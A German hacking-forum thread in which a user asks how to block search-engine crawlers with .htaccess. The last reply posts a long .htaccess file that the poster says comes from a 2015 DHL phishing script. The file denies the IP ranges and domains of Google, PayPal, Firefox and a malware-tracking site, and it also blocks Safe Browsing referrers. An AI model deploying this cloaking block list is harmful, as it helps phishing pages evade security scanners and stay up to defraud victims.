Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

.htaccess crawler/bots blockieren?

- - - - -

  • Bitte melde dich an um zu Antworten
7 Antworten in diesem Thema

#1
fluffybunny

fluffybunny

    Pentester

  • Premium Member
  • Likes
    23
  • 119 Beiträge
  • 7 Bedankt

Hallo Leute,

 

ich würde gerne mit Hilfe der htaccess datei ein paar suchmaschinen crawler/bots von meiner site blockieren.

 

Dafür habe ich folgende htaccess datei erstellt:

RewriteEngine On

RewriteCond %{HTTP_USER_AGENT} ^Googlebot* [OR]
RewriteCond %{HTTP_USER_AGENT} ^bingbot* [OR]
RewriteCond %{HTTP_USER_AGENT} ^msnbot* [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetSeer* [OR]
RewriteCond %{HTTP_USER_AGENT} ^aiHitBot* [OR]
RewriteRule ^.* - [F]

diese habe ich direkt in das root verzeichniss meiner webseite gepackt, sprich var/www/html

wenn ich jetzt meine ip addresse im browser aufrufe, bekomme ich die apache2 test page angezeigt und wenn ich z.B. "meineIP/index.html" aufrufe bekomme ich eine "403 forbiden" page angezeigt, diese sollte aber doch normalerweise jetzt nur kommen, wenn mein eigener UserAgent z.B. auf den von Googlebot etc. geändert wäre.

 

Was funktioniert da nicht richtig?

 

PS: bin in sachen htaccess ein total noob und mich würde mal interessieren für was die zeichen:

 

^.*

 

in der htaccess datei genau stehen?

 

lg

 

fluffybunny

 



#2
ProHex

ProHex

    Hacker

  • Moderator
  • Likes
    211
  • 219 Beiträge
  • 184 Bedankt

Du weißt dass man crawler mit einer robots.txt blockiert oder?



#3
fluffybunny

fluffybunny

    Pentester

  • Premium Member
  • Likes
    23
  • 119 Beiträge
  • 7 Bedankt

ja das weiß ich, hätte nur gedacht dass ich mal was darüber gelesen habe, dass manche crawler bots die robots.txt komplett ignorieren, deswegen wollte ich mit htaccess arbeiten um auf nummer sicher zu gehen.



#4
ProHex

ProHex

    Hacker

  • Moderator
  • Likes
    211
  • 219 Beiträge
  • 184 Bedankt

Das würde ich nicht machen, ist auch so normal nicht notwendig

 

- Einfach robots.txt mit Disallow: *


  • fluffybunny und smc2014 gefällt das

Thanked by 1 Member:
fluffybunny

#5
FalkE

FalkE

    1337

  • Banned
  • PIPPIPPIPPIPPIPPIPPIPPIPPIP
  • Likes
    4
  • 349 Beiträge
  • 79 Bedankt
  • Android [root]
  • Linux

Das würde ich nicht machen, ist auch so normal nicht notwendig

 

- Einfach robots.txt mit Disallow: *

ne robots.txt hält nur "nette" bots ab z.B. der googlebot hält sich an die robots.txt

pöse bots können die datei problemlos ignorieren (ist ja auch nur ne txt mit bissl inhalt).

 

da bringt deine robots.txt garnix.

 

@fluffybunny mit htaccess bist du auf dem richtigen weg.

gibt zig

Please Login HERE or Register HERE to see this link!

, einfach mal google nutzen..


  • fluffybunny und lNobodyl gefällt das

#6
Imperial

Imperial

    Favoured Management

  • Premium Member
  • Likes
    544
  • 421 Beiträge
  • 605 Bedankt
  • 340868
  • verifiziert
  • iPhone
  • Windows, Mac OS

Also laut Problembeschreibung geht es hier um den Google-Bot, Bing, etc. und nicht um irgendwelche "bösen" Bots.

Daher ist die Lösung von ProHex genau die Richtige.


There Is No Business Like Coding Business

 


#7
fluffybunny

fluffybunny

    Pentester

  • Premium Member
  • Likes
    23
  • 119 Beiträge
  • 7 Bedankt

@ FalkE

 

super vielen dank für den Link hat damit sofort funktioniert :-)



#8
marcf2009

marcf2009

    Noob

  • Members
  • PIPPIP
  • Likes
    1
  • 3 Beiträge
  • 0 Bedankt

Ich weiß der Thread ist schon älter, aber ich dachte ich ergänze mal eine variante die unerwünschte ip´s und Useragents aussperrt.  Die Datei stammt aus einem dhl.com Phishingscript von 2015 und muss natürlich angepasst werden.

Options -Indexes
order allow,deny
deny from 89.207.18.182/22
deny from 173.194.69.147/22
deny from 149.3.176.145/22
deny from 66.235.156.128/22
deny from 173.194.69.125/22
deny from 173.194.69.120/22
deny from 173.194.69.102/22
deny from 173.194.69.95/22
deny from 173.194.69.94/22
deny from 173.194.69.91/22
deny from 173.0.88.2/22
deny from 173.0.84.2/22
deny from 173.0.84.34/22
deny from 173.0.88.2/22
deny from 173.0.88.34/22
deny from 2.20.6.85/22
deny from 63.245.213.92/22
deny from 173.194.69.106/22
deny from 173.194.69.147/22
deny from 173.194.69.99/22
deny from 173.194.69.103/22
deny from 173.194.69.104/22
deny from 173.194.69.105/22
deny from 173.194.69.94/22
deny from 173.194.69.106/22
deny from 173.194.69.147/22
deny from 173.194.69.99/22
deny from 173.194.69.103/22
deny from 173.194.69.104/22
deny from 173.194.69.105/22
deny from 173.194.69.94/22
deny from 63.245.213.92/22
deny from 63.245.217.20/22
deny from 64.62.203.172/22
deny from 173.194.69.102/22
deny from 173.194.69.113/22
deny from 173.194.69.138/22
deny from 173.194.69.139/22
deny from 173.194.69.100/22
deny from 173.194.69.101/22
deny from 64.62.203.172/22
deny from 63.245.217.71/22
deny from 188.112.175.207/22
deny from 66.235.139.166/22
deny from 66.235.138.2/22
deny from 66.235.138.59/22
deny from 66.235.139.153/22
deny from 66.235.139.152/22
deny from 66.235.138.44/22
deny from 66.235.139.118/22
deny from 66.235.138.18/22
deny from 66.235.139.121/22
deny from 66.235.138.19/22
deny from 66.235.134.160/22
deny from 66.235.133.8/22
deny from 66.235.133.52/22
deny from 66.235.133.33/22
deny from 66.235.132.152/22
deny from 66.235.133.62/22
deny from 66.235.132.232/22
deny from 66.235.132.118/22
deny from 66.235.133.11/22
deny from 66.235.132.121/22
deny from 66.235.133.14/22
deny from 195.214.79.*
deny from google.com
deny from paypal.com
deny from 112.2o7.com
deny from firefox.com
deny from apple.com
deny from clean-mx.de
deny from env=stealthed
allow from all
RewriteEngine on
# Options +FollowSymlinks
RewriteCond %{HTTP_REFERER} google\.com [NC,OR]
RewriteCond %{HTTP_REFERER} google\.com
RewriteCond %{HTTP_REFERER} paypal\.com
RewriteCond %{HTTP_REFERER} firefox\.com
RewriteRule .* - [F]
RewriteCond %{HTTP_USER_AGENT} ^googlebot [OR] 
RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [OR] 
RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:craftbot@yahoo.com [OR] 
RewriteCond %{HTTP_USER_AGENT} ^ChinaClaw [OR] 
RewriteCond %{HTTP_USER_AGENT} ^Custo [OR] 
RewriteCond %{HTTP_USER_AGENT} ^DISCo [OR] 
RewriteCond %{HTTP_USER_AGENT} ^Download\ Demon [OR] 
RewriteCond %{HTTP_USER_AGENT} ^eCatch [OR] 
RewriteCond %{HTTP_USER_AGENT} ^EirGrabber [OR] 
RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon [OR] 
RewriteCond %{HTTP_USER_AGENT} ^EmailWolf [OR] 
RewriteCond %{HTTP_USER_AGENT} ^Express\ WebPictures [OR] 
RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro [OR] 
RewriteCond %{HTTP_USER_AGENT} ^EyeNetIE [OR] 
RewriteCond %{HTTP_USER_AGENT} ^FlashGet [OR] 
RewriteCond %{HTTP_USER_AGENT} ^GetRight [OR] 
RewriteCond %{HTTP_USER_AGENT} ^GetWeb! [OR] 
RewriteCond %{HTTP_USER_AGENT} ^Go!Zilla [OR] 
RewriteCond %{HTTP_USER_AGENT} ^Go-Ahead-Got-It [OR] 
RewriteCond %{HTTP_USER_AGENT} ^GrabNet [OR] 
RewriteCond %{HTTP_USER_AGENT} ^Grafula [OR] 
RewriteCond %{HTTP_USER_AGENT} ^HMView [OR] 
RewriteCond %{HTTP_USER_AGENT} HTTrack [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} ^Image\ Stripper [OR] 
RewriteCond %{HTTP_USER_AGENT} ^Image\ Sucker [OR] 
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} ^InterGET [OR] 
RewriteCond %{HTTP_USER_AGENT} ^Internet\ Ninja [OR] 
RewriteCond %{HTTP_USER_AGENT} ^JetCar [OR] 
RewriteCond %{HTTP_USER_AGENT} ^JOC\ Web\ Spider [OR] 
RewriteCond %{HTTP_USER_AGENT} ^larbin [OR] 
RewriteCond %{HTTP_USER_AGENT} ^LeechFTP [OR] 
RewriteCond %{HTTP_USER_AGENT} ^Mass\ Downloader [OR] 
RewriteCond %{HTTP_USER_AGENT} ^MIDown\ tool [OR] 
RewriteCond %{HTTP_USER_AGENT} ^Mister\ PiX [OR] 
RewriteCond %{HTTP_USER_AGENT} ^Navroad [OR] 
RewriteCond %{HTTP_USER_AGENT} ^NearSite [OR] 
RewriteCond %{HTTP_USER_AGENT} ^NetAnts [OR] 
RewriteCond %{HTTP_USER_AGENT} ^NetSpider [OR] 
RewriteCond %{HTTP_USER_AGENT} ^Net\ Vampire [OR] 
RewriteCond %{HTTP_USER_AGENT} ^NetZIP [OR] 
RewriteCond %{HTTP_USER_AGENT} ^Octopus [OR] 
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Explorer [OR] 
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Navigator [OR] 
RewriteCond %{HTTP_USER_AGENT} ^PageGrabber [OR] 
RewriteCond %{HTTP_USER_AGENT} ^Papa\ Foto [OR] 
RewriteCond %{HTTP_USER_AGENT} ^pavuk [OR] 
RewriteCond %{HTTP_USER_AGENT} ^pcBrowser [OR] 
RewriteCond %{HTTP_USER_AGENT} ^RealDownload [OR] 
RewriteCond %{HTTP_USER_AGENT} ^ReGet [OR] 
RewriteCond %{HTTP_USER_AGENT} ^SiteSnagger [OR] 
RewriteCond %{HTTP_USER_AGENT} ^SmartDownload [OR] 
RewriteCond %{HTTP_USER_AGENT} ^SuperBot [OR] 
RewriteCond %{HTTP_USER_AGENT} ^SuperHTTP [OR] 
RewriteCond %{HTTP_USER_AGENT} ^Surfbot [OR] 
RewriteCond %{HTTP_USER_AGENT} ^tAkeOut [OR] 
RewriteCond %{HTTP_USER_AGENT} ^Teleport\ Pro [OR] 
RewriteCond %{HTTP_USER_AGENT} ^VoidEYE [OR] 
RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector [OR] 
RewriteCond %{HTTP_USER_AGENT} ^Web\ Sucker [OR] 
RewriteCond %{HTTP_USER_AGENT} ^WebAuto [OR] 
RewriteCond %{HTTP_USER_AGENT} ^WebCopier [OR] 
RewriteCond %{HTTP_USER_AGENT} ^WebFetch [OR] 
RewriteCond %{HTTP_USER_AGENT} ^WebGo\ IS [OR] 
RewriteCond %{HTTP_USER_AGENT} ^WebLeacher [OR] 
RewriteCond %{HTTP_USER_AGENT} ^WebReaper [OR] 
RewriteCond %{HTTP_USER_AGENT} ^WebSauger [OR] 
RewriteCond %{HTTP_USER_AGENT} ^Website\ eXtractor [OR] 
RewriteCond %{HTTP_USER_AGENT} ^Website\ Quester [OR] 
RewriteCond %{HTTP_USER_AGENT} ^WebStripper [OR] 
RewriteCond %{HTTP_USER_AGENT} ^WebWhacker [OR] 
RewriteCond %{HTTP_USER_AGENT} ^WebZIP [OR] 
RewriteCond %{HTTP_USER_AGENT} ^Wget [OR] 
RewriteCond %{HTTP_USER_AGENT} ^Widow [OR] 
RewriteCond %{HTTP_USER_AGENT} ^WWWOFFLE [OR] 
RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR] 
RewriteCond %{HTTP_USER_AGENT} ^Zeus 
RewriteRule ^.* - [F,L]
RewriteEngine on
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?http://safebrowsing-cache.google.com/.*$ [NC]
RewriteRule .* - [F,L]

Bearbeitet von marcf2009, 30 March 2018 - 19:05 Uhr.




  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


This topic has been visited by 56 user(s)


    .Puma, 3eyes, Becks, BlackZetsu, breidi59, BurningWay, Bypass, ChEeTaH182, Crap, CTU, Cube, Cyber Tjak, cyberbitch, CyberFlash, dep0x, Emalik Xantier, FalkE, fluffybunny, Framerater, Franziskaner, frechdax, Goooofy, gtawelt, gutzuu, H2Olli, handrij, Hydra, Imperial, JohnR, Juri, Kaase, keyb0ardz, kiwitone, leonalexkraus, lNobodyl, marcf2009, MarkusxX, n1nja, nibble nibble, NoNameMT, nooob, notfound, PadX18, pi^2, ProHex, Psykoon303, R3V3R53, scrack, Slixer, smc2014, T0NY, Take1T, teekoppe, ueEqlL, z91, Zerobyte
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.